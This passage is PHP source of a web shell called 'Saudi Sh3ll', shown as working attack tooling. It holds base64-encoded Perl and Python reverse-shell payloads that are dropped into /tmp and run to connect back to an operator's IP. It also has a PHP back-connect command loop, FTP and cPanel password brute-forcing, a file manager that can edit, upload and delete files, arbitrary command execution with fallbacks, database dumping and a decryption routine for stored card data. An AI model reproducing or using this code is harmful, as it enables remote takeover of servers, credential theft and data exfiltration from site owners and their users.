CAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";\r\n $back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n $back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i";\r\n if ($op == \'php\') { $sockfd=fsockopen($ip , $port , $errno, $errstr );\r\n if($errno != 0) { echo "$errno : $errstr";\r\n } else if (!$sockfd) { $result = "error connect!

";\r\n } else { fputs ($sockfd , "\r\n/################################\\\r\n# #\r\n# Saudi Sh3ll v1.0 #\r\n# #\r\n# by al-swisre #\r\n# #\r\n\\################################/");\r\n $pwd = shell_exec("pwd");\r\n $sysinfo = shell_exec("uname -a");\r\n $id = shell_exec("id");\r\n $len = 1337;\r\n fputs($sockfd ,$sysinfo . "\\n" );\r\n fputs($sockfd ,$pwd . "\\n" );\r\n fputs($sockfd ,$id ."\\n\\n" );\r\n while(!feof($sockfd)) { $cmdPrompt ="(Saudi sh3ll)[$]> ";\r\n fputs ($sockfd , $cmdPrompt );\r\n $command= fgets($sockfd, $len);\r\n fputs($sockfd , "\\n" . shell_exec($command) . "\\n\\n");\r\n } fclose($sockfd);\r\n } echo "End Connect";\r\n exit;\r\n } elseif ($op == \'perl\') { op_sa("/tmp/sa.pl",$back_perl);\r\n $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");\r\n sleep(1);\r\n echo "
$out\\n".cmd("ps aux | grep sa.pl")."
";\r\n unlink("/tmp/sa.pl");\r\n } elseif ($op == \'python\') { op_sa("/tmp/sa.py",$back_py);\r\n $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");\r\n sleep(1);\r\n echo "
$out\\n".cmd("ps aux | grep sa.py")."
";\r\n } } else if ($_POST[\'con\'] == \'Connect bind\'){ if ($op == \'perl\') { $bind_port = $_POST[\'bind_port\'];\r\n op_sa("/tmp/sa.pl",$bind_perl);\r\n $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");\r\n sleep(1);\r\n echo "
$out\\n".cmd("ps aux | grep sa.pl")."
";\r\n unlink("/tmp/sa.pl");\r\n } else if ($op == \'python\') { $bind_port = $_POST[\'bind_port\'];\r\n op_sa("/tmp/sa.py",$bind_py);\r\n $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");\r\n sleep(1);\r\n echo "
$out\\n".cmd("ps aux | grep sa.py")."
";\r\n unlink("/tmp/sa.py");\r\n } }} break;\r\n case \'brt\': echo "

[ BruteForce ]

";\r\n if (!isset($_POST[\'bru\'])) { echo \'\r\n\r\n\r\n

\r\ntarget :  \r\n \r\n \r\n\r\n

\r\n\r\n\';\r\n exit;\r\n }else { $users = $_POST[\'user\'];\r\n $pass = $_POST[\'pass\'];\r\n $option = $_POST[\'op\'];\r\n $connect_timeout=5;\r\n @ini_set(\'memory_limit\', 1000000000000);\r\n $target = $_POST[\'trg\'];\r\n @set_time_limit(0);\r\n $userlist = explode ("\\n" , $users );\r\n $passlist = explode ("\\n" , $pass );\r\n foreach ($userlist as $user) { $_user = trim($user);\r\n foreach ($passlist as $password ) { $_pass = trim($password);\r\n if($option == "ftp"){ ftp_check($target,$_user,$_pass,$connect_timeout);\r\n } if ($option == "cpanel") { cpanel_check($target,$_user,$_pass,$connect_timeout);\r\n } } } } break;\r\n case \'ab\': echo \'
Saudi Shell

\';\r\n echo "
\r\n
Back Connect :

\r\nIp :  \r\n \r\n \r\n\r\nPort :  \r\n \r\n \r\n\r\n \r\n \r\n \r\n



Bind Connect :

Port : \r\n


";\r\n echo "";\r\n echo "";\r\n echo "";\r\n echo "";\r\n echo "";\r\n echo "";\r\n echo "";\r\n exit;\r\n break;\r\n } } else { $sws = \'al-swisre\' ;\r\n if ($sws != \'al-swisre\'){echo "Coded by al-swisre";\r\n exit;\r\n} if(@$_GET[\'dir\']){ $dir = $_GET[\'dir\'];\r\n if($dir != \'nullz\') $dir = @cleandir($dir);\r\n } $curdir = @cleandir(@getcwd());\r\n $self = $_SERVER[\'PHP_SELF\'];\r\n $me = $_SERVER[\'PHP_SELF\'];\r\n if($dir=="") $dir = $curdir;\r\n $dirx = explode(DIRECTORY_SEPARATOR, $dir);\r\n $files = array();\r\n $folders = array();\r\n echo"
Coded By : al-swisre
E-mail : od@hotmail.com
From : Saudi Arabian
Age : 2/1995
twitter : al_swisre
S.Greetz 2 : Mr.Alsa3ek - Ejram Hacker
Greetz 2 : e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 - Mr.Pixy
And : Mr.Black - IraQiaN-r0x - Oxygen - locked - n4ss .. and All members of v4-team.com
";\r\n echo"
";\r\n echo" Your path :  \r\n";\r\n for($i=0;\r\n$i$dirx[$i]" . DIRECTORY_SEPARATOR);\r\n } echo "

";\r\n echo"
";\r\n echo"";\r\n if ($handle = @opendir($dir)) { while (false != ($link = readdir($handle))) { $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;\r\n $gr = @posix_getgrgid(@filegroup($dir."/".$link));\r\n if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array();\r\n @$file[\'link\'] = "[ $link ]";\r\n $file[\'pir\'] = "".@wsoPermsColor($dir."/".$link)."";\r\n $file[\'pir2\'] = "".@perm($dir."/".$link)."";\r\n $folder = "" ;\r\n array_push($folders, $folder);\r\n } else{ $file = array();\r\n $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";\r\n $file[\'pir\'] = "".@wsoPermsColor($dir."/".$link)."";\r\n $file[\'pir2\'] = "".@perm($dir."/".$link)."";\r\n $file[\'size\'] = @number_format(@filesize($dir."/".$link)/1024,2);\r\n @$file[\'link\'] = "".$link ."";\r\n $file = "" ;\r\n array_push($files, $file);\r\n } } asort($folders);\r\n asort($files);\r\n foreach($folders as $folder) echo $folder;\r\n foreach($files as $file) echo $file;\r\n echo "
NameSizeModifyOwner/GroupPermissionsOption
".$file[\'link\']."dir".date(\'Y-m-d H:i:s\', @filemtime($dir."/".$link))."".$on3[\'name\']."/".$gr[\'name\']."".$file[\'pir\']." \r\n \r\n \r\n".$file[\'pir2\']."R - C - rm
".$file[\'link\']."".$file[\'size\']."".date(\'Y-m-d H:i:s\', @filemtime($dir."/".$link))."".$on3[\'name\']."/".$gr[\'name\']."".$file[\'pir\']." \r\n \r\n \r\n".$file[\'pir2\']."E - R - C - D - rm
" ;\r\n closedir($handle);\r\n } } if ($_GET[\'sws\'] == \'rname\') { $dir = $_GET[\'dir\'];\r\n $file = $_GET[\'file\'];\r\n if (!isset($file) or !isset ($dir)){ echo "

[ Back ]";\r\n exit;\r\n} if (!isset($_POST[\'edit\'])) { echo "
\r\n
Edit \r\n \r\n \r\nRename \r\n \r\nChmod \r\n \r\nDownload\r\nDelete

\r\ndir : ".$_GET[\'dir\']." \r\n \r\n \r\n file name : ".$_GET[\'file\']."

\r\n
\r\nnew name :

\r\n\r\n\r\n
\r\n\r\n ";\r\n }else { $new = $_POST[\'name\'];\r\n $rn = @rename ($dir."/".$file,$dir."/".$new);\r\n if(!$rn) { @cmd("cd $dir;\r\nmv $file $new ");\r\n }else { echo "

Name change successfully";\r\n echo "

[ Back ]";\r\n } } } if ($_GET[\'sws\'] == \'chmod\') { $dir = $_GET[\'dir\'];\r\n $file = $_GET[\'file\'];\r\n if (!isset($file) or !isset($dir)){ echo "

[ Back ]";\r\n exit;\r\n} if (!isset($_POST[\'edit\'])) { echo "
\r\n
Edit \r\n \r\n \r\nRename \r\n \r\nChmod \r\n \r\nDownload\r\nDelete

\r\ndir : ".$_GET[\'dir\']." \r\n \r\n \r\n file name : ".$_GET[\'file\']."

\r\n
\r\nFile to chmod:  \r\n \r\n \r\n\r\n

\r\n\r\n
\r\n\r\n ";\r\n } else { $pir = $_POST[\'ch\'];\r\n if ($pir == \'755\' ) { $cd = @chmod($_POST[\'file\'],0775);\r\n } elseif ($pir == \'777\') { $cd = @chmod($_POST[\'file\'],0777);\r\n } elseif ($pir == \'644\') { $cd = $cd = @chmod($_POST[\'file\'],0644);\r\n } if(!$cd) { echo "ERROR";\r\n }else { echo "changed Successfully";\r\n echo "

[ Back ]";\r\n } } } if ($_GET[\'sws\'] == \'edit\') { $file = $_GET[\'file\'];\r\n $dir = $_GET[\'dir\'];\r\n if (!isset($file) or !isset($dir)){ echo "

[ Back ]";\r\n exit;\r\n} if (!isset($_POST[\'ed\'])) { $fil33 = @fopen($dir."/".$file, \'r\');\r\n $content = @fread($fil33, @filesize($dir."/".$file));\r\n echo "\r\n
Edit \r\n \r\n \r\nRename \r\n \r\nChmod \r\n \r\nDownload\r\nDelete
\r\n
\r\ndir : ".$_GET[\'dir\']." \r\n \r\n \r\n file name : ".$_GET[\'file\']."

\r\n
\r\n
\r\n

\r\n\r\n
\r\n\r\n\';\r\n } else { $oo = @fopen($dir."/".$file, \'w\');\r\n $ow = @fwrite($oo, @stripslashes($_POST[\'fil3\']));\r\n @fclose($oo);\r\n if (!$ow){echo "Error";\r\n}else { echo header("Location: ?sws=edit&file=$file&dir=$dir");\r\n } } } else if ($_GET[\'sws\'] == \'dow\') { $file = $_GET[\'file\'];\r\n $dir = $_GET[\'dir\'];\r\n @sa_download ($dir."/".$file);\r\n } if ($_GET[\'sws\'] == \'rm\') { $dir = $_GET[\'dir\'];\r\n $file = $_GET[\'file\'];\r\n if (!isset($file) or !isset ($dir)){ echo "

[ Back ]";\r\n exit;\r\n} if (!isset($_POST[\'edit\'])) { echo "
\r\n
Edit \r\n \r\n \r\nRename \r\n \r\nChmod \r\n \r\nDownload\r\nDelete
\r\n
\r\ndir : ".$_GET[\'dir\']." \r\n \r\n \r\n file name : ".$_GET[\'file\']."

\r\n
\r\n\r\n\r\n
\r\n\r\n ";\r\n }else { $rn = @unlink ($dir."/".$file);\r\n if(!$rn) { $rn = @rmdir ($dir."/".$file);\r\n }elseif (!$rn) { $rn = @cmd("cd $dir;\r\nrm $file");\r\n } else if (!$rn){@cmd ("cd $dir;\r\nrm -r $file");\r\n} else{ echo header("Location: $pg?dir=$dir");\r\n } echo header("Location: $pg?dir=$dir");\r\n } } else if ($_GET[\'sws\'] == \'mkdir\') { $dir = $_POST[\'dir\'];\r\n $file = $_POST[\'n4me\'];\r\n $mkdir = @mkdir ($dir."/".$file,0755);\r\n if (!$mkdir){@cmd ("mkdir $dir/$file ");\r\n}else {header("Location: $pg?dir=$dir");\r\n } header("Location: $pg?dir=$dir");\r\n } else if ($_GET[\'sws\'] == \'mkfile\') { $dir = $_POST[\'dir\'];\r\n $file = $_POST[\'n4me\'];\r\n $mkdir = @fopen($dir."/".$file,\'w\');\r\n if (!$mkdir){@cmd ("touch $dir/$file ");\r\n}else {header("Location: $pg?dir=$dir");\r\n } } else if ($_GET[\'sws\'] == \'up\') { $dir = $_POST[\'dir\'];\r\n if(@move_uploaded_file($_FILES[\'upfile\'][\'tmp_name\'], $dir."/".$_FILES[\'upfile\'][\'name\'])) { header("Location: $pg?dir=$dir");\r\n } else { echo \'

Not uploaded !!

\';\r\nexit;\r\n } } else if ($_GET[\'sws\'] == \'rfile\') { $file = $_POST[\'n4me\'];\r\n echo "dir : ".$_GET[\'dir\']." \r\n \r\n \r\n file name : ".$_GET[\'file\']."

";\r\n if (!isset($file)){$file = $_GET[\'dir\']."/".$_GET[\'file\'];\r\n} echo "
";\r\n $r3ad = @fopen($file, \'r\');\r\n if ($r3ad){ $content = @fread($r3ad, @filesize($file));\r\n echo "
".htmlentities($content)."
";\r\n } else if (!$r3ad) { echo "
";\r\n $r3ad = @show_source($file) ;\r\n echo "
";\r\n } else if (!$r3ad) { echo "
";\r\n $r3ad = @highlight_file($file);\r\n echo "
";\r\n } else if (!$r3ad) { echo "
";\r\n $sm = @symlink($file,\'sym.txt\');\r\n if ($sm){ $r3ad = @fopen(\'sym.txt\', \'r\');\r\n $content = @fread($r3ad, @filesize($dir."/".$file));\r\n echo "
".htmlentities($content)."
";\r\n } } echo "
";\r\n }else if ($_GET[\'sws\'] == \'cmd\') { $cmd = $_POST[\'n4me\'];\r\n $dir = $_POST[\'dir\'];\r\n if (isset($cmd)) { echo "
";\r\n } } else if ($_GET[\'sws\'] == \'site\') { $read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;\r\n $sit3 = @findit($read,"
","
");\r\n echo "
 ";\r\n echo $sit3;\r\n echo "
";\r\n exit;\r\n } if(@$_GET[\'dir\']){ $dir = $_GET[\'dir\'];\r\n if($dir != \'nullz\') $dir = cleandir($dir);\r\n } echo "\r\n\r\n

\r\n
\r\n

\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
\r\nChange dir :
\r\n\r\n\r\n\r\n\r\n
\r\n\r\nMake dir :
\r\n\r\n\r\n\r\n
\r\nread file :
\r\n\r\n\r\n\r\n
\r\n\r\nMake file :
\r\n
\r\n\r\n\r\n
\r\n
\r\nExecute :
\r\n\r\n\r\n\r\n
\r\n
\r\nUpload file :
\r\n
\r\n\r\n\r\n\r\n
\r\n
\r\n";\r\n function cmd($cfe) { $res = \'\';\r\n if (!empty($cfe)) { if(function_exists(\'exec\')) { @exec($cfe,$res);\r\n $res = join("\\n",$res);\r\n } elseif(function_exists(\'shell_exec\')) { $res = @shell_exec($cfe);\r\n } elseif(function_exists(\'system\')) { @ob_start();\r\n @system($cfe);\r\n $res = @ob_get_contents();\r\n @ob_end_clean();\r\n } elseif(function_exists(\'passthru\')) { @ob_start();\r\n @passthru($cfe);\r\n $res = @ob_get_contents();\r\n @ob_end_clean();\r\n } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = "";\r\n while(!@feof($f)) { $res .= @fread($f,1024);\r\n } @pclose($f);\r\n } } return $res;\r\n } function sa($i) { return @str_repeat(" \r\n",$i);\r\n } function decrypt ($string,$cc_encryption_hash) { $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);\r\n $hash_key = _hash ($key);\r\n $hash_length = strlen ($hash_key);\r\n $string = base64_decode ($string);\r\n $tmp_iv = substr ($string, 0, $hash_length);\r\n $string = substr ($string, $hash_length, strlen ($string) - $hash_length);\r\n $iv = $out = \'\';\r\n $c = 0;\r\n while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));\r\n ++$c;\r\n } $key = $iv;\r\n $c = 0;\r\n while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));\r\n } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));\r\n ++$c;\r\n } return $out;\r\n } function _hash ($string) { $hash = (function_exists (\'sha1\')) ? sha1($string):md5($string);\r\n $out = \'\';\r\n $c = 0;\r\n while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));\r\n $c += 2;\r\n } return $out;\r\n } function backup_tables($path,$host,$user,$pass,$name,$tables = \'*\') { $link = @mysql_connect($host,$user,$pass);\r\n @mysql_select_db($name,$link);\r\n if($tables == \'*\') { $tables = array();\r\n $result = @mysql_query(\'SHOW TABLES\');\r\n while($row = @mysql_fetch_row($result)) { $tables[] = $row[0];\r\n } } else { $tables = is_array($tables) ? $tables : explode(\',\',$tables);\r\n } foreach($tables as $table) { $result = mysql_query(\'SELECT * FROM \'.$table);\r\n $num_fields = mysql_num_fields($result);\r\n $row2 = mysql_fetch_row(mysql_query(\'SHOW CREATE TABLE \'.$table));\r\n $return.= "\\n\\n".$row2[1].";\r\n\\n\\n";\r\n for ($i = 0;\r\n $i < $num_fields;\r\n $i++) { while($row = mysql_fetch_row($result)) { $return.= \'INSERT INTO \'.$table.\' VALUES(\';\r\n for($j=0;\r\n $j<$num_fields;\r\n $j++) { $row[$j] = addslashes($row[$j]);\r\n $row[$j] = ereg_replace("\\n","\\\\n",$row[$j]);\r\n if (isset($row[$j])) { $return.= \'"\'.$row[$j].\'"\' ;\r\n } else { $return.= \'""\';\r\n } if ($j<($num_fields-1)) { $return.= \',\';\r\n } } $return.= ");\r\n\\n";\r\n } } $return.="\\n\\n\\n";\r\n } $handle = @fopen($path,\'w+\');\r\n @fwrite($handle,$return);\r\n @fclose($handle);\r\n } function search($string){ $q = mysql_query("SHOW TABLE STATUS");\r\n $data = array();\r\n while($table = mysql_fetch_array($q)){ $query = "SELECT * FROM $table[Name]";\r\n $result = mysql_query($query);\r\n $row = @mysql_fetch_assoc($result);\r\n if(!$row){ continue;\r\n } $columns = array_keys($row);\r\n $data[$table[\'Name\']] = $columns;\r\n } $tables = array();\r\n foreach($data as $table=>$columns){ $query = "SELECT * FROM `$table` WHERE ";\r\n foreach($columns as $key=>$column){ if($key == 0){ $query .= "`$column` LIKE \'%$string%\'";\r\n }else{ $query .= " OR `$column` LIKE \'%$string%\'";\r\n } } $query = mysql_query($query);\r\n $result = mysql_num_rows($query);\r\n if($result > 0){ $tables[] = $table;\r\n } } $founded = array();\r\n foreach($tables as $table){ $columns = $data[$table];\r\n foreach($columns as $column){ $query = "SELECT * FROM `$table` WHERE `$column` LIKE \'%$string%\'";\r\n $query = mysql_query($query);\r\n $result = mysql_num_rows($query);\r\n if($result > 0){ $founded[] = array(\'table\'=>$table,\'column\'=>$column);\r\n } } } return $founded;\r\n } function cleandir($d){ $d = @realpath($d);\r\n $d = str_replace("\\\\\\\\", "\\\\", $d);\r\n $d = str_replace("////", "//", $d);\r\n return($d);\r\n } function wsoPermsColor($f) { if (!@is_readable($f)) return \'\' . @wsoPerms(@fileperms($f)) . \'\';\r\n elseif (!@is_writable($f)) return \'\' . @wsoPerms(@fileperms($f)) . \'\';\r\n else return \'\' . @wsoPerms(@fileperms($f)) . \'\';\r\n } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function perm($file) { if(file_exists($file)) { return @substr(@sprintf(\'%o\', @fileperms($file)), -4);\r\n } else { return "????";\r\n } } function sa_download($path) { header(\'Content-Description: File Transfer\');\r\n header(\'Content-Type: application/octet-stream\');\r\n header(\'Content-Disposition: attachment;\r\n filename=\'.basename($path));\r\n header(\'Content-Transfer-Encoding: binary\');\r\n header(\'Expires: 0\');\r\n header(\'Cache-Control: must-revalidate, post-check=0, pre-check=0\');\r\n header(\'Pragma: public\');\r\n header(\'Content-Length: \' . filesize($path));\r\n ob_clean();\r\n flush();\r\n readfile($path);\r\n exit;\r\n } function findit($mytext,$starttag,$endtag) { $posLeft = @stripos($mytext,$starttag)+strlen($starttag);\r\n $posRight = @stripos($mytext,$endtag,$posLeft+1);\r\n return @substr($mytext,$posLeft,$posRight-$posLeft);\r\n } function MsSQL() { if(@function_exists(\'mssql_connect\')) { $msSQL = \'ON\';\r\n } else { $msSQL = \'OFF\';\r\n } return $msSQL;\r\n } function MySQL2() { $mysql_try = @function_exists(\'mysql_connect\');\r\n if($mysql_try) { $mysql = \'ON\';\r\n } else { $mysql = \'OFF\';\r\n } return $mysql;\r\n } function Gzip() { if (@function_exists(\'gzencode\')) { $gzip = \'ON\';\r\n } else { $gzip = \'OFF\';\r\n } return $gzip;\r\n } function MysqlI() { if (@function_exists(\'mysqli_connect\')) { $mysqli = \'ON\';\r\n } else { $mysqli = \'OFF\';\r\n } return $mysqli;\r\n } function MSQL() { if (@function_exists(\'msql_connect\')) { $mSql = \'ON\';\r\n } else { $mSql = \'OFF\';\r\n } return $mSql;\r\n } function PostgreSQL() { if(@function_exists(\'pg_connect\')) { $postgreSQL = \'ON\';\r\n } else { $postgreSQL = \'OFF\';\r\n } return $postgreSQL;\r\n } function Oracle() { if(@function_exists(\'ocilogon\')) { $oracle = \'ON\';\r\n } else { $oracle = \'OFF\';\r\n } return $oracle;\r\n } function RegisterGlobals() { if(@ini_get(\'register_globals\')) { $registerg= \'ON\';\r\n } else { $registerg= \'OFF\';\r\n } return $registerg;\r\n } function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB";\r\n } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB";\r\n } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB";\r\n } else { $size = $size . " B";\r\n } return $size;\r\n } function Curl() { if(extension_loaded(\'curl\')) { $curl = \'ON\';\r\n } else { $curl = \'OFF\';\r\n } return $curl;\r\n } function magicQouts() { $mag=get_magic_quotes_gpc();\r\n if (empty($mag)) { $mag = \'OFF\';\r\n } else { $mag= \'ON\';\r\n } return $mag;\r\n } function openBaseDir() { $openBaseDir = @ini_get("open_basedir");\r\n if (!$openBaseDir) { $openBaseDir = \'OFF\';\r\n } else { $openBaseDir = \'ON\';\r\n } return $openBaseDir;\r\n } function ftp_check($host,$user,$pass,$timeout){ $ch = curl_init();\r\n curl_setopt($ch, CURLOPT_URL, "ftp://$host");\r\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);\r\n curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);\r\n curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");\r\n curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);\r\n curl_setopt($ch, CURLOPT_FAILONERROR, 1);\r\n $data = curl_exec($ch);\r\n if ( curl_errno($ch) == 28 ) { print " Error : Connection timed out ";\r\n exit;\r\n} elseif ( curl_errno($ch) == 0 ){ print "\r\nfound username : $user - password :\r\n $pass
";\r\n}curl_close($ch);\r\n exit;\r\n} function cpanel_check($host,$user,$pass,$timeout){ $ch = curl_init();\r\n curl_setopt($ch, CURLOPT_URL, "http://$host:2082");\r\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);\r\n curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");\r\n curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);\r\n curl_setopt($ch, CURLOPT_FAILONERROR, 1);\r\n $data = curl_exec($ch);\r\n if ( curl_errno($ch) == 28 ) { print " Error : Connection timed out";\r\n exit;\r\n} elseif ( curl_errno($ch) == 0 ){ print "\r\nfound username : $user - password :\r\n$pass
